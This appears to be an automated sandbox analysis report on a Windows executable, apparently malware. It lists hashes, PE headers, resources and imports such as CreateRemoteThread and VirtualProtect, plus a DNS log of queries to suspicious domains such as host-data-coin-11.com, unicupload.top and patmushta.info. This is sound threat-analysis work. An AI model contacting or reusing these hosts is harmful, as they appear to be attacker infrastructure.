File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.696489645572037
TrID:
• Win32 Executable (generic) a (10002005/4) 99.83%
• Windows Screen Saver (13104/52) 0.13%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:GNXG5XLBEH.exe
File size:321536
MD5:6f48e0e76c5dfb3fc3aa45311fa6d0ef
SHA1:981a29377351493ce6bce4d3aedeec9034dee056
SHA256:277ac2c203e37dcf3b71748e7de0610ba4bf87ddbb7a19cbe7e6be4cce5ed175
SHA512:394f5c1e1e83eea7a838270edd90ae644b4a4f8f0009ac9f382400ea10960f04a4df4ec8e10cd75aba7fd9f3424c951bdc6015742899ec77ac666c05f09692d4
SSDEEP:6144:AJfyOCHHmx9MGofauzMYFm6ggAc3DJbkLGrl6:A9onmx4ffPw6kc3FkLm
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,...~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...wi._...........................

File Icon

Icon Hash:c8d0d8e0f8e0f4e8

Static PE Info

General

Entrypoint:0x41b840
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x5F906977 [Wed Oct 21 17:01:43 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:6801e04a0c2ca60ac2497c0d8723846b

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007FDCCC6B142Bh
call 00007FDCCC6A43A6h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0043DE38h
push 0041EA20h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF94h
push ebx
push esi
push edi
mov eax, dword ptr [00440354h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
mov dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0040109Ch]
mov dword ptr [ebp-04h], FFFFFFFEh
jmp 00007FDCCC6A43B8h
mov eax, 00000001h
ret
mov esp, dword ptr [ebp-18h]
mov dword ptr [ebp-78h], 000000FFh
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, dword ptr [ebp-78h]
jmp 00007FDCCC6A44E7h
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007FDCCC6A4524h
mov dword ptr [ebp-6Ch], eax
push 00000001h
call 00007FDCCC6B1E0Ah
add esp, 04h
test eax, eax
jne 00007FDCCC6A439Ch
push 0000001Ch
call 00007FDCCC6A44DCh
add esp, 04h
call 00007FDCCC6AD484h
test eax, eax
jne 00007FDCCC6A439Ch
push 00000010h

Rich Headers

Programming Language:
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [ASM] VS2008 build 21022
• [LNK] VS2008 build 21022
• [RES] VS2008 build 21022
• [C++] VS2008 build 21022

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e564 | 0x50 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x150000 | 0x8730 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x159000 | 0x1e00 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x13a0 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9100 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x34c | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3e91e | 0x3ea00 | False | 0.583777756986 | data | 6.97280495233 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x40000 | 0x10c988 | 0x1800 | False | 0.340983072917 | data | 3.46813100102 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.vaxego | 0x14d000 | 0x5 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gig | 0x14e000 | 0xea | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.hojotew | 0x14f000 | 0xd93 | 0xe00 | False | 0.00697544642857 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x150000 | 0x8730 | 0x8800 | False | 0.594985064338 | data | 5.82818673804 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x159000 | 0x465a | 0x4800 | False | 0.344021267361 | data | 3.68094584687 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
AFX_DIALOG_LAYOUT | 0x157048 | 0x2 | data | Dutch | Netherlands
AFX_DIALOG_LAYOUT | 0x157040 | 0x2 | data | Dutch | Netherlands
AFX_DIALOG_LAYOUT | 0x157050 | 0x2 | data | Dutch | Netherlands
AFX_DIALOG_LAYOUT | 0x157058 | 0x2 | data | Dutch | Netherlands
CIDAFICUDUROSOTAROM | 0x156628 | 0x6c7 | ASCII text, with very long lines, with no line terminators | Assamese | India
VIDIWAYAPENIGU | 0x156cf0 | 0x2fa | ASCII text, with very long lines, with no line terminators | Assamese | India
RT_CURSOR | 0x157060 | 0x8a8 | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317" | Dutch | Netherlands
RT_ICON | 0x150740 | 0x6c8 | data | Assamese | India
RT_ICON | 0x150e08 | 0x568 | GLS_BINARY_LSB_FIRST | Assamese | India
RT_ICON | 0x151370 | 0x10a8 | data | Assamese | India
RT_ICON | 0x152418 | 0x988 | dBase III DBT, version number 0, next free block index 40 | Assamese | India
RT_ICON | 0x152da0 | 0x468 | GLS_BINARY_LSB_FIRST | Assamese | India
RT_ICON | 0x153258 | 0x8a8 | data | Assamese | India
RT_ICON | 0x153b00 | 0x6c8 | data | Assamese | India
RT_ICON | 0x1541c8 | 0x568 | GLS_BINARY_LSB_FIRST | Assamese | India
RT_ICON | 0x154730 | 0x10a8 | data | Assamese | India
RT_ICON | 0x1557d8 | 0x988 | data | Assamese | India
RT_ICON | 0x156160 | 0x468 | GLS_BINARY_LSB_FIRST | Assamese | India
RT_STRING | 0x157920 | 0xe4 | data | Dutch | Netherlands
RT_STRING | 0x157a08 | 0x3bc | data | Dutch | Netherlands
RT_STRING | 0x157dc8 | 0x6e6 | data | Dutch | Netherlands
RT_STRING | 0x1584b0 | 0x1a0 | data | Dutch | Netherlands
RT_STRING | 0x158650 | 0xdc | data | Dutch | Netherlands
RT_ACCELERATOR | 0x157000 | 0x10 | data | Dutch | Netherlands
RT_ACCELERATOR | 0x156ff0 | 0x10 | data | Dutch | Netherlands
RT_GROUP_CURSOR | 0x157908 | 0x14 | data | Dutch | Netherlands
RT_GROUP_ICON | 0x153208 | 0x4c | data | Assamese | India
RT_GROUP_ICON | 0x1565c8 | 0x5a | data | Assamese | India
None | 0x157020 | 0xa | data | Dutch | Netherlands
None | 0x157030 | 0xa | data | Dutch | Netherlands
None | 0x157010 | 0xa | data | Dutch | Netherlands

Imports

DLL | Import
KERNEL32.dll | DeactivateActCtx, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthA, GetDefaultCommConfigA, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameW, CopyFileA, TlsGetValue, GetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, SetPriorityClass, WritePrivateProfileStringW, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, GetProfileStringW, WriteProfileSectionW, GetProfileStringA, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, ReadFileScatter, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceA, WriteConsoleA, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, GetExitCodeProcess, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBW, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetOverlappedResult, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, SetFileShortNameA, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetModuleHandleW, WriteConsoleOutputCharacterA, GetConsoleMode, HeapFree, OpenMutexA, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetConsoleAliasesLengthW, GetCurrentProcessId, lstrcpynA, SetNamedPipeHandleState, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, AssignProcessToJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, FindActCtxSectionGuid, TerminateProcess, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, GetConsoleOutputCP, CloseHandle, CreateFileA
USER32.dll | OemToCharA
ADVAPI32.dll | GetFileSecurityA

Possible Origin

Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands | 
Assamese | India | 

Network Behavior

Network Port Distribution

TCP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 14, 2022 19:09:10.061032057 CET | 192.168.2.5 | 8.8.8.8 | 0xddd3 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:10.540186882 CET | 192.168.2.5 | 8.8.8.8 | 0x8cb0 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:11.001127005 CET | 192.168.2.5 | 8.8.8.8 | 0xb88a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:11.482151031 CET | 192.168.2.5 | 8.8.8.8 | 0x9f8a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:11.671001911 CET | 192.168.2.5 | 8.8.8.8 | 0xac73 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:11.842314005 CET | 192.168.2.5 | 8.8.8.8 | 0x8f08 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:13.487374067 CET | 192.168.2.5 | 8.8.8.8 | 0x9857 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:13.655011892 CET | 192.168.2.5 | 8.8.8.8 | 0xc3e6 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:14.117935896 CET | 192.168.2.5 | 8.8.8.8 | 0x5f4f | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:15.862174034 CET | 192.168.2.5 | 8.8.8.8 | 0xb8b3 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:16.343225002 CET | 192.168.2.5 | 8.8.8.8 | 0x82e5 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:16.538634062 CET | 192.168.2.5 | 8.8.8.8 | 0xdc51 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:17.318478107 CET | 192.168.2.5 | 8.8.8.8 | 0x4068 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:17.542150974 CET | 192.168.2.5 | 8.8.8.8 | 0xfeed | Standard query (0) | privacy-tools-for-you-780.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:21.053544998 CET | 192.168.2.5 | 8.8.8.8 | 0x7a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:21.225140095 CET | 192.168.2.5 | 8.8.8.8 | 0x6c1c | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:21.414207935 CET | 192.168.2.5 | 8.8.8.8 | 0xa496 | Standard query (0) | unicupload.top | A (IP address) | IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.574366093 CET192.168.2.58.8.8.80xa674Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.755300045 CET192.168.2.58.8.8.80x2ae1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.930671930 CET192.168.2.58.8.8.80x45adStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:22.103765011 CET192.168.2.58.8.8.80x58feStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:22.276225090 CET192.168.2.58.8.8.80xc071Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:24.539366007 CET192.168.2.58.8.8.80x9c96Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:24.708920956 CET192.168.2.58.8.8.80x80f1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:24.883527040 CET192.168.2.58.8.8.80xa1aaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:25.057566881 CET192.168.2.58.8.8.80x44dfStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.415585995 CET192.168.2.58.8.8.80x6ce0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.608776093 CET192.168.2.58.8.8.80xff0fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.781918049 CET192.168.2.58.8.8.80x85c6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.971153021 CET192.168.2.58.8.8.80xacfStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:29.799472094 CET192.168.2.58.8.8.80xbf32Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:30.237000942 CET192.168.2.58.8.8.80x6a35Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:30.404517889 CET192.168.2.58.8.8.80x71ebStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:43.368099928 CET192.168.2.58.8.8.80xf76cStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:46.057374954 CET192.168.2.58.8.8.80x7543Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:51.701255083 CET192.168.2.58.8.8.80xa402Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:51.869379044 CET192.168.2.58.8.8.80xd245Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:52.061209917 CET192.168.2.58.8.8.80xff90Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:52.685651064 CET192.168.2.58.8.8.80x682fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:52.867140055 CET192.168.2.58.8.8.80x6e11Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.037122011 CET192.168.2.58.8.8.80xde79Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.203223944 CET192.168.2.58.8.8.80xf614Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.369959116 CET192.168.2.58.8.8.80xc24dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.533875942 CET192.168.2.58.8.8.80xd299Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.705943108 CET192.168.2.58.8.8.80xcff8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.905255079 CET192.168.2.58.8.8.80x48d4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:54.187428951 CET192.168.2.58.8.8.80x498fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:54.374730110 CET192.168.2.58.8.8.80xc996Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:54.642282963 CET192.168.2.58.8.8.80x8151Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.267733097 CET192.168.2.58.8.8.80x5361Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.433132887 CET192.168.2.58.8.8.80xc314Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.609422922 CET192.168.2.58.8.8.80xf7c5Standard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.989248037 CET192.168.2.58.8.8.80x4d2aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.160315990 CET192.168.2.58.8.8.80xe30aStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.346404076 CET192.168.2.58.8.8.80x8b73Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.572753906 CET192.168.2.58.8.8.80x42a6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.744287968 CET192.168.2.58.8.8.80x5eb0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.939517021 CET192.168.2.58.8.8.80x32e9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:59.110661030 CET192.168.2.58.8.8.80xabaeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.348560095 CET192.168.2.58.8.8.80x8611Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.543709993 CET192.168.2.58.8.8.80x80e8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.731966019 CET192.168.2.58.8.8.80xbba2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.919981003 CET192.168.2.58.8.8.80x53bbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:08.140322924 CET192.168.2.58.8.8.80x9f55Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:12.538479090 CET192.168.2.58.8.8.80xf62cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:12.788062096 CET192.168.2.58.8.8.80xe3c9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:12.958772898 CET192.168.2.58.8.8.80xf6ddStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:15.889401913 CET192.168.2.58.8.8.80xd2d7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:16.059786081 CET192.168.2.58.8.8.80xafa8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:16.257030964 CET192.168.2.58.8.8.80xa528Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:17.758302927 CET192.168.2.58.8.8.80x96feStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:17.944961071 CET192.168.2.58.8.8.80xe098Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:25.004935026 CET192.168.2.58.8.8.80x8ab5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:25.170507908 CET192.168.2.58.8.8.80x4602Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:25.353204966 CET192.168.2.58.8.8.80x72b3Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:26.418530941 CET192.168.2.58.8.8.80x8ec9Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:27.932214975 CET192.168.2.58.8.8.80x970Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.099606991 CET192.168.2.58.8.8.80xdb9eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.560112953 CET192.168.2.58.8.8.80x7f32Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.724280119 CET192.168.2.58.8.8.80x198cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.901891947 CET192.168.2.58.8.8.80xa4fcStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:31.461930037 CET192.168.2.58.8.8.80x387Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:32.138627052 CET192.168.2.58.8.8.80xf4eeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:32.386116982 CET192.168.2.58.8.8.80x3a28Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:33.787772894 CET192.168.2.58.8.8.80xe497Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:34.013952971 CET192.168.2.58.8.8.80x6864Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:34.291979074 CET192.168.2.58.8.8.80x5f07Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:35.669361115 CET192.168.2.58.8.8.80xbe71Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:35.835163116 CET192.168.2.58.8.8.80x130eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:36.012844086 CET192.168.2.58.8.8.80x7e50Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.088051081 CET192.168.2.58.8.8.80x490eStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.963994026 CET192.168.2.58.8.8.80x6a1eStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:44.740060091 CET192.168.2.58.8.8.80x55ccStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:44.765990973 CET192.168.2.58.8.8.80x247bStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:44.972399950 CET192.168.2.58.8.8.80xce19Standard query (0)ipwhois.appA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.654849052 CET192.168.2.58.8.8.80xb7cdStandard query (0)c9d0e790b353537889bd47a364f5acff43c11f248.xyzA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.838181019 CET192.168.2.58.8.8.80xbecaStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:47.321703911 CET192.168.2.58.8.8.80x2e44Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:48.172898054 CET192.168.2.58.8.8.80xa86aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:57.879049063 CET192.168.2.58.8.8.80x71c1Standard query (0)dl.uploadgram.meA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.204118013 CET192.168.2.58.8.8.80xc8faStandard query (0)yahoo.comMX (Mail exchange)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.225033045 CET192.168.2.58.8.8.80xd0a2Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
